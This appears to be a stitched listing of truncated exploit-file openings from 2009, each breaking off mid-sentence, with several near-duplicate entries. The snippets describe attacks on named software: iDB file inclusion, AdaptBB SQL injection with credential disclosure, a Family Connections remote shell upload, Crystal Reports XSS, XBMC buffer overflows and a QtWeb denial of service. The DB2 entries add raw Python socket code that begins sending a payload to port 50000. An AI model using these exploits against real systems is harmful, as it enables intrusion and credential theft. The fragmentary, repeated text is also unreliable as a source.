#!/usr/bin/env # LOTFREE 2009 - lotfree.next-touch.com # Local require() vulnerability in iDB (a PHP/MySQL BBS) # Test on version 0.2.5 Pre-Alpha SVN 243 (released March 30, 2009) # # No checks are made on var skin in inc/profilemain.php before savin
------------- by DATA_SNIPER GREETZ TO THE FOUNDER ;) fore more information and bug analyses: http://www.at4re.com/f/showthread.php?p=47560 i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] so i can
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!! Tested:Win xp sp2 eng Win vista sp1 Vendor url:http://xbmc.org/ Release date:April the 4th 2009 versions affected: windows all versions. I had tried awh
#!/usr/bin/perl -w # # AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit # # Description # ----------- # AdaptBB contains a flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the inc/bb/topic
/* Family Connections = 1.8.2 - Remote Shell Upload Exploit Author: Salvatore drosophila Fresta Contact: drosophilaxxx@gmail.com Date: 3 April 2009 The following software will upload a simple php shell. To execute remote commands, you must open the
# Discovered by Dennis Yurichev dennis@conus.info # DB2TEST database should be present on target system # GUEST account with QQ password shoule be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM)
# Discovered by Dennis Yurichev dennis@conus.info # DB2TEST database should be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobj.connect ((argv[1], 50000)) sockobj.send( x00xBExD0x41x
# Discovered by Dennis Yurichev dennis@conus.info# DB2TEST database should be present on target system# GUEST account with QQ password shoule be present on target systemfrom sys import *from socket import *sockobj = socket(AF_INET, SOCK_STREAM)socko
# Discovered by Dennis Yurichev dennis@conus.info# DB2TEST database should be present on target systemfrom sys import *from socket import *sockobj = socket(AF_INET, SOCK_STREAM)sockobj.connect ((argv[1], 50000))sockobj.send(x00xBExD0x41x00x01
- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS- DescriptionCross-site scripting; vbscript rather than javascript. Subsequent pagewill contain pop up reading fsck_cissp. ID, PROMPTEX-SESSION_ID,PROMPTEX-TO_DATE, PROMPTEX-
##################################################################################### QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)## Summary: QtWeb is compact, portable and secure web browser having some unique UI#
#!/usr/bin/env python ''' Xbmc get tag from file name request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ versions affected: Linux windows tested other versions are also possibly affected. Release date:April the
#!/usr/bin/env python ''' Xbmc takescreenshot request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected.
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected. Restrictio
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected. Restrictio
/* XBMC multiple remote buffer overflow vulnerabilities. XBMC is an award winning media center application for Linux, Mac OS X, Windows and XBox. The ultimate hub for all your media, XBMC is easy to use, looks slick, and has a large helpful community
